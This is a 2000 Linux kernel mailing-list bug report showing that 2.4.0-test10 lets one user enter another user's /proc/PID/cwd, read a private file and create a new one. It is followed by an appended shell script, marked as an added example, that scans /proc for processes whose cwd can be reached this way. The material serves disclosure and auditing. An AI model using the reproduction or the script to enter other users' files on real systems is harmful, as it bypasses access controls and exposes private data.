From: Lutz Pressler <lp@SerNet.DE>
To: linux-kernel@vger.kernel.org
Subject: 2.4.(0-test10): /proc security hole
Date: 5 Nov 2000 13:02:14 GMT	[thread overview]
Message-ID: <8u3lom$5es$1@server1.GoeNet.DE> (raw)

Hello,

I do not think that the following behaviour (2.4.0-test10 on i386, also
tested with 2.4.0-test8) is intended: 

testuser@vax:~ > id
uid=503(testuser) gid=100(users) groups=100(users)
testuser@vax:~ > ls -lad .
drwx------   7 testuser users        4096 Nov  5 13:38 .

testuser@vax:~ > cd dir
testuser@vax:~/dir > ls -la 
total 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir


Myself (lpressl, uid=500) cannot change into /home/testuser/dir,
as expected:
lpressl@vax:~ > cd ~testuser/dir
bash: cd: /home/testuser/dir: Permission denied

BUT: let testuser be logged in and have a process (bash) with cwd
/home/testuser/dir. Then
lpressl@vax:~ > ps uax |grep testuser
yields
...
testuser   588  0.0  2.1  2256 1360 tty2     S    13:38   0:00 -bash
...

lpressl@vax:~ > cd /proc/588
lpressl@vax:/proc/588 > ls -la
total 0
dr-xr-xr-x   3 testuser users     0 Nov  5 13:49 .
dr-xr-xr-x  59 root     root      0 Nov  5 13:34 ..
-r--r--r--   1 testuser users     0 Nov  5 13:49 cmdline
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 cwd -> /home/testuser/dir
-r--------   1 testuser users     0 Nov  5 13:49 environ
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 exe -> /bin/bash
dr-x------   2 testuser users     0 Nov  5 13:49 fd
-r--r--r--   1 testuser users     0 Nov  5 13:49 maps
-rw-------   1 testuser users     0 Nov  5 13:49 mem
lrwxrwxrwx   1 testuser users     0 Nov  5 13:49 root -> /
-r--r--r--   1 testuser users     0 Nov  5 13:49 stat
-r--r--r--   1 testuser users     0 Nov  5 13:49 statm
-r--r--r--   1 testuser users     0 Nov  5 13:49 status

cd cwd shouldn't be possible, should it? But let's see:
lpressl@vax:/proc/588 > cd cwd
lpressl@vax:/proc/588/cwd > 

Oops....

lpressl@vax:/proc/588/cwd > ls -la
total 16
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 .
drwx------   7 testuser users        4096 Nov  5 13:38 ..
-rw-r--r--   1 testuser users           7 Nov  5 13:39 file
drwxrwxr-x   2 testuser users        4096 Nov  5 13:39 subdir

lpressl@vax:/proc/588/cwd > cat file
secret
lpressl@vax:/proc/588/cwd > cd subdir
lpressl@vax:/proc/588/cwd/subdir > 
lpressl@vax:/proc/588/cwd/subdir > echo ohoh > newfile
lpressl@vax:/proc/588/cwd/subdir > ls -la
total 12
drwxrwxr-x   2 testuser users        4096 Nov  5 13:53 .
drwxr-xr-x   3 testuser users        4096 Nov  5 13:39 ..
-rw-r--r--   1 lpressl  users           5 Nov  5 13:53 newfile


This is bad. 2.2 kernels don't show this behavior. There _any_
/proc/PID/cwd "directory" has no group or world permissions
at all.

I haven't looked at the code at all yet. Anybody with a fix?


Regards,
  Lutz
  


-- 
  _              |  Lutz Pressler          |  Tel: ++49-551-3700002
 |_     |\ |     |  Service Network GmbH   |  FAX: ++49-551-3700009
 ._|ER  | \|ET   |  Bahnhofsallee 1b       |   mailto:lp@SerNet.DE
Service Network  |  D-37081 Goettingen     |  http://www.SerNet.DE/
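The mail above reproduces the hole by hand: the home directory is mode 0700, so the real path /home/testuser/dir is blocked at the parent, yet following another user's /proc/PID/cwd symlink lands inside that directory anyway. The script below is an added example, not part of Lutz Pressler's message, that automates the same check on whatever kernel it runs on: for every process owned by a different uid it reads the cwd link, tries to enter the target by its real path, and then tries to enter it through /proc/PID/cwd. A line is printed only when the real path is refused but the /proc route works, which is exactly the situation shown for PID 588. The function names proc_cwd_bypasses and proc_cwd_bypass_count and the tab-separated output format are my own choices. On a kernel that restricts /proc/PID/cwd to the process owner (2.2 as the mail notes, and every fixed kernel since), readlink() itself fails for foreign processes and the count is 0.

```shell
#!/bin/sh
# Added example (not from the original mail): audit whether this kernel lets a
# non-owner traverse another user's /proc/PID/cwd into a directory whose real
# path is not searchable for the non-owner. Function names are hypothetical.

# Print one line per process (pid, owner uid, cwd target) whose cwd can be
# entered through /proc/PID/cwd although the real path is refused.
proc_cwd_bypasses() {
    me=$(id -u)
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        # /proc/PID is owned by the process owner; skip our own processes,
        # since entering our own cwd proves nothing about a bypass.
        owner=$(stat -c %u "$p" 2>/dev/null) || continue
        [ "$owner" = "$me" ] && continue
        # On a fixed kernel readlink() on a foreign cwd fails with EACCES,
        # so this alone rules the process out. (Exited processes also vanish.)
        target=$(readlink "$p/cwd" 2>/dev/null) || continue
        # Direct route: can we search our way down the real path?
        if (cd "$target" 2>/dev/null); then
            continue   # reachable anyway, so /proc adds no privilege
        fi
        # /proc route: the 2.4.0-test10 behaviour from the mail succeeds here.
        if (cd "$p/cwd" 2>/dev/null && ls . >/dev/null 2>&1); then
            printf '%s\t%s\t%s\n' "$pid" "$owner" "$target"
        fi
    done
}

# Number of bypassable processes; 0 means the hole is not present.
proc_cwd_bypass_count() {
    # Without procfs (non-Linux, or /proc not mounted) there is nothing to test.
    [ -d /proc/self ] || { echo 0; return 0; }
    proc_cwd_bypasses | wc -l | tr -d ' '
}

# Run stand-alone: print the offending processes, then the total.
proc_cwd_bypasses
echo "bypassable cwd entries: $(proc_cwd_bypass_count)"
```

Run it as an unprivileged user while another user has a shell sitting in a directory below a 0700 home, as in the mail; a non-zero count names the PIDs whose cwd leaks. Running it as root is meaningless, since root can search every path directly and nothing is ever reported.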

Thread overview: 2+ messages
2000-11-05 13:02 Lutz Pressler [this message]
2000-11-06  0:29 ` 2.4.(0-test10): /proc security hole Jan Dvorak
